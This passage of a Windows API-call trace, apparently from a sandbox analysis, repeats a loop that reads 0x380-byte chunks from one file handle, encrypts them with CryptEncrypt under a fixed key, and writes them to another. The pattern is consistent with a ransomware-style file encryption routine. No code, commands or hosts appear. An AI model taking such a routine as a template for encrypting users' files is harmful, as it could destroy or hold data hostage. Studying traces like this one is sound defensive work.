[0269.757] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.757] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.758] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.758] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.758] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.758] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.759] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.759] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.759] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.759] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.759] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.759] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.760] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.760] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.760] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.760] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.760] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.760] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.761] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.761] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.761] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.761] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.761] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.761] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.762] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.762] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.763] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.763] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.764] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.764] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.764] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.764] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 